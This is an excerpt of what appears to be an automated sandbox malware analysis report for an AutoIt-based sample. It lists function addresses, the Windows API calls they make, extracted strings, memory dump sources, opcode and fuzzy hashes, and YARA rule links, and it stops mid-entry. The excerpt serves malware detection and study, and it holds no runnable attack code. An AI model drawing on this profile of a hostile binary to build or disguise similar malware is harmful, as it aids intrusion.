                                                                                  • Snapshot File: hcaresult_0_2_4f0000_ek8LkB2Cgo.jbxd
                                                                                  Similarity
                                                                                  • API ID: _wcscmp$__fread_nolock
                                                                                  • String ID: FILE
                                                                                  • API String ID: 4029003684-3121273764
                                                                                  • Opcode ID: fb55e87e42b9f2329ed5a09fc137c86eeb73bb2ff377bbff97f5172e2b8c6250
                                                                                  • Instruction ID: 4f017300bcff1b042a9486dedcc17010f746efd86112ab924b072d3a3bff56a4
                                                                                  • Opcode Fuzzy Hash: fb55e87e42b9f2329ed5a09fc137c86eeb73bb2ff377bbff97f5172e2b8c6250
                                                                                  • Instruction Fuzzy Hash: 7441D972A0021A7BDF209BA4DC46FEF7FB9AF89714F00046AF605F7181DA759A04CB55
                                                                                  Function 0055A76A Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 96windowCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • SendMessageW.USER32(?,00001132,00000000,?), ref: 0055A85A
                                                                                  • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 0055A86F
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1317973392.00000000004F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1317954311.00000000004F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318061028.000000000057D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318061028.000000000059E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318112515.00000000005AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318137759.00000000005B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_4f0000_ek8LkB2Cgo.jbxd
                                                                                  Similarity
                                                                                  • API ID: MessageSend
                                                                                  • String ID: '
                                                                                  • API String ID: 3850602802-1997036262
                                                                                  • Opcode ID: 0663cedc554b06af16553d18b9574736eddb44ff6e92cb0183a03679b3ce032c
                                                                                  • Instruction ID: 91bf2ecd4cc879234f30a3a54c18a8ffc01c9888105541f031a712fd5de4d044
                                                                                  • Opcode Fuzzy Hash: 0663cedc554b06af16553d18b9574736eddb44ff6e92cb0183a03679b3ce032c
                                                                                  • Instruction Fuzzy Hash: E741E674E012099FDB54CFA8D891BEA7BB9FF08305F14016AED05AB341D770A94ADFA1
                                                                                  Function 0055975A Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 95COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • DestroyWindow.USER32(?,?,?,?), ref: 0055980E
                                                                                  • MoveWindow.USER32(?,?,?,?,?,00000001,?,?,?), ref: 0055984A
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1317973392.00000000004F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1317954311.00000000004F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318061028.000000000057D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318061028.000000000059E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318112515.00000000005AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318137759.00000000005B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_4f0000_ek8LkB2Cgo.jbxd
                                                                                  Similarity
                                                                                  • API ID: Window$DestroyMove
                                                                                  • String ID: static
                                                                                  • API String ID: 2139405536-2160076837
                                                                                  • Opcode ID: 899d0fe7b6054810fb7145f5ac550bfe381f5a6ba2eea8651fad03e9e587b10e
                                                                                  • Instruction ID: bd70a1a769c0c70f4862e1600077b663b03580c1ef8e92cc1ed239eae9e93c7a
                                                                                  • Opcode Fuzzy Hash: 899d0fe7b6054810fb7145f5ac550bfe381f5a6ba2eea8651fad03e9e587b10e
                                                                                  • Instruction Fuzzy Hash: B8319E71110604AAEB109F74CC91BFB7BB9FF99761F00861AF8A9C7190CA34AC89D760
                                                                                  Function 00535157 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 87windowCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • _memset.LIBCMT ref: 005351C6
                                                                                  • GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00535201
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1317973392.00000000004F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1317954311.00000000004F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318061028.000000000057D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318061028.000000000059E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318112515.00000000005AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318137759.00000000005B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_4f0000_ek8LkB2Cgo.jbxd
                                                                                  Similarity
                                                                                  • API ID: InfoItemMenu_memset
                                                                                  • String ID: 0
                                                                                  • API String ID: 2223754486-4108050209
                                                                                  • Opcode ID: 4d9d6a4c5056cc92368d31e0a3ebec88cd185e6fe4101385a28134af597acf91
                                                                                  • Instruction ID: 3aca91fd5293acb0e05925f22c75852136559331aee77d9b78594896061eb02c
                                                                                  • Opcode Fuzzy Hash: 4d9d6a4c5056cc92368d31e0a3ebec88cd185e6fe4101385a28134af597acf91
                                                                                  • Instruction Fuzzy Hash: 8C31E4396007059BEB24CF99D849BAFBFF5FF85350F141419F985A61A0F7709A44CB50
                                                                                  Function 0054658B Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 83COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1317973392.00000000004F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1317954311.00000000004F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318061028.000000000057D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318061028.000000000059E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318112515.00000000005AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318137759.00000000005B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_4f0000_ek8LkB2Cgo.jbxd
                                                                                  Similarity
                                                                                  • API ID: __snwprintf
                                                                                  • String ID: , $$AUTOITCALLVARIABLE%d
                                                                                  • API String ID: 2391506597-2584243854
                                                                                  • Opcode ID: 4a29bfc5098eda3c05c72220262a763ef4a8633d56619a0327ae593a7f62bf3c
                                                                                  • Instruction ID: bf2b67c53c0d521062d8e26882a7295cfc31b6007fac5fbce48aa6359ce96058
                                                                                  • Opcode Fuzzy Hash: 4a29bfc5098eda3c05c72220262a763ef4a8633d56619a0327ae593a7f62bf3c
                                                                                  • Instruction Fuzzy Hash: D1219331A00119AFCF10EF65D982FED7BB5BF46348F01046AF605AB181DB74EA45CBA6
                                                                                  Function 005593CF Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 72windowCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • SendMessageW.USER32(00000000,00000143,00000000,?), ref: 0055945C
                                                                                  • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00559467
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1317973392.00000000004F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1317954311.00000000004F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318061028.000000000057D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318061028.000000000059E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318112515.00000000005AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318137759.00000000005B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_4f0000_ek8LkB2Cgo.jbxd
                                                                                  Similarity
                                                                                  • API ID: MessageSend
                                                                                  • String ID: Combobox
                                                                                  • API String ID: 3850602802-2096851135
                                                                                  • Opcode ID: 12ca9faf92e28188e1679ed2f01f72cb8fc46e39fd01869f06509f8d1257eca4
                                                                                  • Instruction ID: cb77cef3ec463b5cb618309fcc96e3c7391f8f0f464597f843ea98e84792f789
                                                                                  • Opcode Fuzzy Hash: 12ca9faf92e28188e1679ed2f01f72cb8fc46e39fd01869f06509f8d1257eca4
                                                                                  • Instruction Fuzzy Hash: 8C11D0B1200208EFEF119F54DC90EBB3B6EFB883A5F100126FD189B290D6359C569760
                                                                                  Function 0055DA42 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 71COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                    • Part of subcall function 0050B34E: GetWindowLongW.USER32(?,000000EB), ref: 0050B35F
                                                                                  • GetActiveWindow.USER32 ref: 0055DA7B
                                                                                  • EnumChildWindows.USER32(?,0055D75F,00000000), ref: 0055DAF5
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1317973392.00000000004F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1317954311.00000000004F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318061028.000000000057D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318061028.000000000059E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318112515.00000000005AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318137759.00000000005B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_4f0000_ek8LkB2Cgo.jbxd
                                                                                  Similarity
                                                                                  • API ID: Window$ActiveChildEnumLongWindows
                                                                                  • String ID: T1T
                                                                                  • API String ID: 3814560230-1051708705
                                                                                  • Opcode ID: 871f964b205f2a3655c8417b9043a644ece18bd1cbaafe47a7daad784ff2ad36
                                                                                  • Instruction ID: 84da9c937e362df271df881139cd19f0b75546649272d3761f16625e64aad606
                                                                                  • Opcode Fuzzy Hash: 871f964b205f2a3655c8417b9043a644ece18bd1cbaafe47a7daad784ff2ad36
                                                                                  • Instruction Fuzzy Hash: 74215C36204601DFC764DF68D860AA67BF5FF99321F65061AE86A873E0D730B844DF64
                                                                                  Function 005598FE Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 67COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                    • Part of subcall function 0050D17C: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 0050D1BA
                                                                                    • Part of subcall function 0050D17C: GetStockObject.GDI32(00000011), ref: 0050D1CE
                                                                                    • Part of subcall function 0050D17C: SendMessageW.USER32(00000000,00000030,00000000), ref: 0050D1D8
                                                                                  • GetWindowRect.USER32(00000000,?), ref: 00559968
                                                                                  • GetSysColor.USER32(00000012), ref: 00559982
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1317973392.00000000004F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1317954311.00000000004F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318061028.000000000057D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318061028.000000000059E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318112515.00000000005AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318137759.00000000005B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_4f0000_ek8LkB2Cgo.jbxd
                                                                                  Similarity
                                                                                  • API ID: Window$ColorCreateMessageObjectRectSendStock
                                                                                  • String ID: static
                                                                                  • API String ID: 1983116058-2160076837
                                                                                  • Opcode ID: ff813e26220f73f2683b9d40bb219c9780e37f56c00a4fdb0159494289273eb3
                                                                                  • Instruction ID: 225fe748c48f244b453a1a4cc51038f566ee842aa2275f70dbf31accede5aaea
                                                                                  • Opcode Fuzzy Hash: ff813e26220f73f2683b9d40bb219c9780e37f56c00a4fdb0159494289273eb3
                                                                                  • Instruction Fuzzy Hash: 9911267252020AAFDB04DFB8CC45AEA7BB8FF48355F014629FD55E2250E738E854DB60
                                                                                  Function 00559617 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 64windowCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • GetWindowTextLengthW.USER32(00000000), ref: 00559699
                                                                                  • SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 005596A8
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1317973392.00000000004F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1317954311.00000000004F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318061028.000000000057D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318061028.000000000059E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318112515.00000000005AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318137759.00000000005B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_4f0000_ek8LkB2Cgo.jbxd
                                                                                  Similarity
                                                                                  • API ID: LengthMessageSendTextWindow
                                                                                  • String ID: edit
                                                                                  • API String ID: 2978978980-2167791130
                                                                                  • Opcode ID: ecfae7af55b118516da72d5cd8fabe433c1d57d2dbdbc29c6455edc078c7db54
                                                                                  • Instruction ID: c70b951671e7c2f7f287f57c8947a3217299547164fea79be94bb16737a0db83
                                                                                  • Opcode Fuzzy Hash: ecfae7af55b118516da72d5cd8fabe433c1d57d2dbdbc29c6455edc078c7db54
                                                                                  • Instruction Fuzzy Hash: EB118871100109EAEB105EA4ECA4AAB3B6AFB153A9F500716FD25971E0C7399C58ABA0
                                                                                  Function 00535262 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 62windowCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • _memset.LIBCMT ref: 005352D5
                                                                                  • GetMenuItemInfoW.USER32(00000030,?,00000000,00000030), ref: 005352F4
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1317973392.00000000004F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1317954311.00000000004F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318061028.000000000057D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318061028.000000000059E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318112515.00000000005AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318137759.00000000005B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_4f0000_ek8LkB2Cgo.jbxd
                                                                                  Similarity
                                                                                  • API ID: InfoItemMenu_memset
                                                                                  • String ID: 0
                                                                                  • API String ID: 2223754486-4108050209
                                                                                  • Opcode ID: 29d48e4ace42ff323dc5dfd773ceb49b589a158e204d16aeede40c4fa5597be5
                                                                                  • Instruction ID: f42cdc3a954aeeeddb14202b34bd25d2b07f6502b34c3e0653624b1d3939da82
                                                                                  • Opcode Fuzzy Hash: 29d48e4ace42ff323dc5dfd773ceb49b589a158e204d16aeede40c4fa5597be5
                                                                                  • Instruction Fuzzy Hash: 3011EF76901A14ABDF60DFA8D904B9E7FB8BB05790F141125F902E72A0F3B0ED04DBA0
                                                                                  Function 00544D9F Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 61networkCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 00544DF5
                                                                                  • InternetSetOptionW.WININET(00000000,00000032,?,00000008), ref: 00544E1E
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1317973392.00000000004F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1317954311.00000000004F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318061028.000000000057D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318061028.000000000059E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318112515.00000000005AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318137759.00000000005B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_4f0000_ek8LkB2Cgo.jbxd
                                                                                  Similarity
                                                                                  • API ID: Internet$OpenOption
                                                                                  • String ID: <local>
                                                                                  • API String ID: 942729171-4266983199
                                                                                  • Opcode ID: 45b96c61ef45509b8d630a2703aebd150de8a79b4887129b15d5210f28bec1d7
                                                                                  • Instruction ID: 2a93d7bbb4400e6f1379db85390e3b11cd156c75b446575d145457e5bbc509e5
                                                                                  • Opcode Fuzzy Hash: 45b96c61ef45509b8d630a2703aebd150de8a79b4887129b15d5210f28bec1d7
                                                                                  • Instruction Fuzzy Hash: 34119A70981221FBDB298F618889FFBFEA8FF16799F10862AF50596140D2705994DAE0
                                                                                  Function 0051A70C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 59COMMONLIBRARYCODE
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • IsProcessorFeaturePresent.KERNEL32(00000017), ref: 005237A7
                                                                                  • ___raise_securityfailure.LIBCMT ref: 0052388E
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1317973392.00000000004F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1317954311.00000000004F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318061028.000000000057D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318061028.000000000059E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318112515.00000000005AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318137759.00000000005B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_4f0000_ek8LkB2Cgo.jbxd
                                                                                  Similarity
                                                                                  • API ID: FeaturePresentProcessor___raise_securityfailure
                                                                                  • String ID: ([
                                                                                  • API String ID: 3761405300-2148022395
                                                                                  • Opcode ID: a00acbfce1f186affb14c9c272759a880bdaad71f5c5708839580ebca075a1fa
                                                                                  • Instruction ID: f26d8e6cdb0b2a703591799237d5a4f72c01eebfa70c877c47bacb75aad23ef3
                                                                                  • Opcode Fuzzy Hash: a00acbfce1f186affb14c9c272759a880bdaad71f5c5708839580ebca075a1fa
                                                                                  • Instruction Fuzzy Hash: F821E6B5501304DFE781DF15F9866423BB8FB69350F106A2AE5048A3E1E3B4F988EB45
                                                                                  Function 0054A82C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 52networkCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • inet_addr.WSOCK32(00000000,00000000,?,?,?,00000000), ref: 0054A84E
                                                                                  • htons.WSOCK32(00000000,?,00000000), ref: 0054A88B
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1317973392.00000000004F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1317954311.00000000004F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318061028.000000000057D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318061028.000000000059E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318112515.00000000005AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318137759.00000000005B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_4f0000_ek8LkB2Cgo.jbxd
                                                                                  Similarity
                                                                                  • API ID: htonsinet_addr
                                                                                  • String ID: 255.255.255.255
                                                                                  • API String ID: 3832099526-2422070025
                                                                                  • Opcode ID: 79220393deb2ca4811752e63ea9a5e9a40393817f2ad1c8aa72ed2427eeaa39f
                                                                                  • Instruction ID: 0b191b5adea70b6c7d988e6a8f6ad9c5d06f6d6552671d4baf5662491b656f68
                                                                                  • Opcode Fuzzy Hash: 79220393deb2ca4811752e63ea9a5e9a40393817f2ad1c8aa72ed2427eeaa39f
                                                                                  • Instruction Fuzzy Hash: 08012279200305ABCB119F68D88AFEDBB78FF45318F10842AF516AB2D1C771E8058752
                                                                                  Function 0052B781 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 51windowCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • SendMessageW.USER32(?,000001A2,000000FF,?), ref: 0052B7EF
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1317973392.00000000004F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1317954311.00000000004F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318061028.000000000057D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318061028.000000000059E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318112515.00000000005AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318137759.00000000005B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_4f0000_ek8LkB2Cgo.jbxd
                                                                                  Similarity
                                                                                  • API ID: MessageSend
                                                                                  • String ID: ComboBox$ListBox
                                                                                  • API String ID: 3850602802-1403004172
                                                                                  • Opcode ID: 6dbf684457b7192c1668dc16b82848c1ec3bf5fce658ebfda69d84935c64800e
                                                                                  • Instruction ID: ccdbfa798547e2e551458ec9f705d0d0acabed4bb4bb2d0cccd0c81cb941ae52
                                                                                  • Opcode Fuzzy Hash: 6dbf684457b7192c1668dc16b82848c1ec3bf5fce658ebfda69d84935c64800e
                                                                                  • Instruction Fuzzy Hash: CA014C7160012CAFDB04EBA4EC42DFE3779BF47314B04061DF561632C2DB74580887A4
                                                                                  Function 0052B67D Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 49windowCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • SendMessageW.USER32(?,00000180,00000000,?), ref: 0052B6EB
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1317973392.00000000004F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1317954311.00000000004F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318061028.000000000057D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318061028.000000000059E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318112515.00000000005AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318137759.00000000005B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_4f0000_ek8LkB2Cgo.jbxd
                                                                                  Similarity
                                                                                  • API ID: MessageSend
                                                                                  • String ID: ComboBox$ListBox
                                                                                  • API String ID: 3850602802-1403004172
                                                                                  • Opcode ID: 218c22cfd36b1a65a6e45f313f4dfd4545afd2f89478a6ac68beef308dec7369
                                                                                  • Instruction ID: f60b6bc1bb63679dab303bc548b300cc02df1725d7104943cf1158528f37826c
                                                                                  • Opcode Fuzzy Hash: 218c22cfd36b1a65a6e45f313f4dfd4545afd2f89478a6ac68beef308dec7369
                                                                                  • Instruction Fuzzy Hash: 1001A27564101CABDB04EBA4EA53EFE77B8AF07348F10001DB502B31D2DB946E1897B9
                                                                                  Function 0052B700 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 48windowCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • SendMessageW.USER32(?,00000182,?,00000000), ref: 0052B76C
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1317973392.00000000004F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1317954311.00000000004F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318061028.000000000057D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318061028.000000000059E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318112515.00000000005AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318137759.00000000005B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_4f0000_ek8LkB2Cgo.jbxd
                                                                                  Similarity
                                                                                  • API ID: MessageSend
                                                                                  • String ID: ComboBox$ListBox
                                                                                  • API String ID: 3850602802-1403004172
                                                                                  • Opcode ID: 9a30dba56444ff3b9973b09a3d18d8708299d71864c05b09711cbba0f3da1d66
                                                                                  • Instruction ID: b218473ff28d1e04e17e9978ac8f7121c4eca875ecf27021f93740b78b7eaedf
                                                                                  • Opcode Fuzzy Hash: 9a30dba56444ff3b9973b09a3d18d8708299d71864c05b09711cbba0f3da1d66
                                                                                  • Instruction Fuzzy Hash: 8501A275640118ABDB04E7A4EA43AFE77ACAF06348F14001AB501B31D2DBA45E0997B5
                                                                                  Function 00514D7C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 45COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1317973392.00000000004F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1317954311.00000000004F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318061028.000000000057D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318061028.000000000059E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318112515.00000000005AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318137759.00000000005B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_4f0000_ek8LkB2Cgo.jbxd
                                                                                  Similarity
                                                                                  • API ID: __calloc_crt
                                                                                  • String ID: "[
                                                                                  • API String ID: 3494438863-3208272576
                                                                                  • Opcode ID: 409f3a896e5d0f18e3c8216ef2459d1cbb1ca844be719b32ef40f08af3cc2dd5
